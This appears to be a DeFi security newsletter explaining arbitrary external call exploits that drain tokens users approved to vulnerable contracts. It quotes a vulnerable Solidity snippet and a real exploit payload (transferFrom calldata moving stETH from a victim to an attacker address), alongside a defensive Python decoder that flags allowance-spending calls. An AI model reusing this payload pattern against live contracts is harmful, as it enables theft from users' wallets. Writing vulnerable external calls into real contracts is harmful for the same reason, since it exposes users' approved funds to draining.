Greetings!
A well-known exploitation pattern that takes advantage of arbitrary external call vulnerabilities has been picking up lately. Unlike other smart contract exploits, this one targets the protocol's users who approved their tokens to the vulnerable contract. Seneca ($6.5M) and Fx Protocol ($5K) were compromised this week using this technique. Similar compromises happened earlier this year, such as Socket ($3.3M), Basket DAO ($107K), and others. Let's take a look at sample vulnerable code from the FxUSDFacet contract:
function transferInAndConvert(ConvertInParams memory params, address tokenOut) internal returns (uint256 amountOut) {
    [.. snip ..]
    if (params.src == address(0)) {
        // Arbitrary External Call: target, value and calldata all come from the caller
        (_success, ) = params.target.call{ value: params.amount }(params.data);
    [.. snip ..]
In the snippet above, the contract makes an external call to a user-specified target address with user-specified calldata. Consider the following parameters, used in a recent exploit, that specify the stETH token contract 0xae7ab9..d7fe84 as the target:
{
  "params": {
    "src": "0x0000000000000000000000000000000000000000",
    "amount": "0",
    "target": "0xae7ab96520de3a18e5e111b5eaab095312d7fe84",
    "data": "0x23b872dd000000000000000000000000eb16a13b91579125c9bf5eaf8215f647d7b9778c0000000000000000000000003aa228a80f50763045bdfc45012da124bd0a68090000000000000000000000000000000000000000000000001f8bb663d0c2a9f2",
    "minOut": "0"
  },
  "tokenOut": "0xac3e018457b222d93114458476f3e3416abbe38f"
}
This specially crafted payload executes the transferFrom (0x23b872dd) method on the stETH (0xae7ab9…d7fe84) contract to transfer 2.273 stETH from the victim (0xeb16a1…) to the attacker (0x3aa228…). The only precondition is that the victim had approved stETH to the vulnerable contract, which now spends that allowance on the attacker's behalf. Attackers tend to mass-exploit such approvals, draining every wallet that holds an approval to the exploited contract, which turns into a literal feast as multiple bad actors join the hack in progress.
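To make the payload concrete, here is an added Python decoder (not the newsletter's or the protocol's code) that unpacks the data field above into selector and arguments, and shows how a monitor or test suite for a contract that forwards calls could flag calldata that would spend user allowances. The selector table is a constructed subset of the ERC-20 ABI and the protected-token set is an assumed configuration.

```python
"""Decode an arbitrary-call `data` field and flag ERC-20 selectors that
would spend allowances users granted to the forwarding contract.
Added example; the payload is the one quoted in the newsletter."""

# Constructed subset of ERC-20: first 4 bytes of keccak256(signature).
SELECTORS = {
    "23b872dd": ("transferFrom", ("address", "address", "uint256")),
    "095ea7b3": ("approve", ("address", "uint256")),
}
# Methods that move or delegate funds the forwarding contract may spend.
ALLOWANCE_SPENDING = {"transferFrom", "approve"}

STETH = "0xae7ab96520de3a18e5e111b5eaab095312d7fe84"
PAYLOAD_DATA = ("0x23b872dd"
    "000000000000000000000000eb16a13b91579125c9bf5eaf8215f647d7b9778c"
    "0000000000000000000000003aa228a80f50763045bdfc45012da124bd0a6809"
    "0000000000000000000000000000000000000000000000001f8bb663d0c2a9f2")


def decode_calldata(data: str) -> dict:
    """Split calldata into selector, method name and ABI-decoded head args."""
    raw = bytes.fromhex(data[2:] if data.startswith("0x") else data)
    selector = raw[:4].hex()
    name, types = SELECTORS.get(selector, ("unknown", ()))
    words = [raw[4 + 32 * i: 4 + 32 * (i + 1)] for i in range(len(types))]
    if any(len(w) != 32 for w in words):
        raise ValueError("calldata shorter than the ABI head requires")
    args = []
    for typ, word in zip(types, words):
        if typ == "address":
            if any(word[:12]):  # ABI left-pads addresses with 12 zero bytes
                raise ValueError("non-zero padding in address word")
            args.append("0x" + word[12:].hex())
        else:  # uint256, big-endian
            args.append(int.from_bytes(word, "big"))
    return {"selector": selector, "name": name, "args": tuple(args)}


def would_spend_allowance(target: str, data: str, protected: set) -> bool:
    """True when the call hits a token users approve to this contract and
    the method would move or re-delegate those approved funds."""
    if target.lower() not in protected:
        return False
    return decode_calldata(data)["name"] in ALLOWANCE_SPENDING


if __name__ == "__main__":
    call = decode_calldata(PAYLOAD_DATA)
    print(call["name"], call["args"][0], "->", call["args"][1],
          call["args"][2] / 10**18, "stETH")
    print("spends allowance:", would_spend_allowance(STETH, PAYLOAD_DATA, {STETH}))
```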
PSA for Developers: Avoid arbitrary external calls where some or all of the parameters (target, value, calldata) are unfiltered and controlled by the caller.
The Atlantis Loans compromise from June 2023 continues draining user accounts almost a year (!!!) after the initial governance hack. This week, the bad actors stole $650K worth of wrapped BTC to claim their largest loot yet.
PSA for Users: Proactively revoke approvals from not only compromised, but also abandoned projects which may be used to steal your assets in the future.
The premium section this week contains vulnerability and exploit details, along with indicators from 7 compromises netting $15M+, covering the projects mentioned above as well as Serenity Shield, Smoofs, Shido, and others.
To gain access to comprehensive vulnerability write-ups, post-mortems, exploit proof of concepts (PoCs), attacker addresses, and additional data regarding this week’s compromises, please subscribe to the premium plan below.
Let’s dive into the news!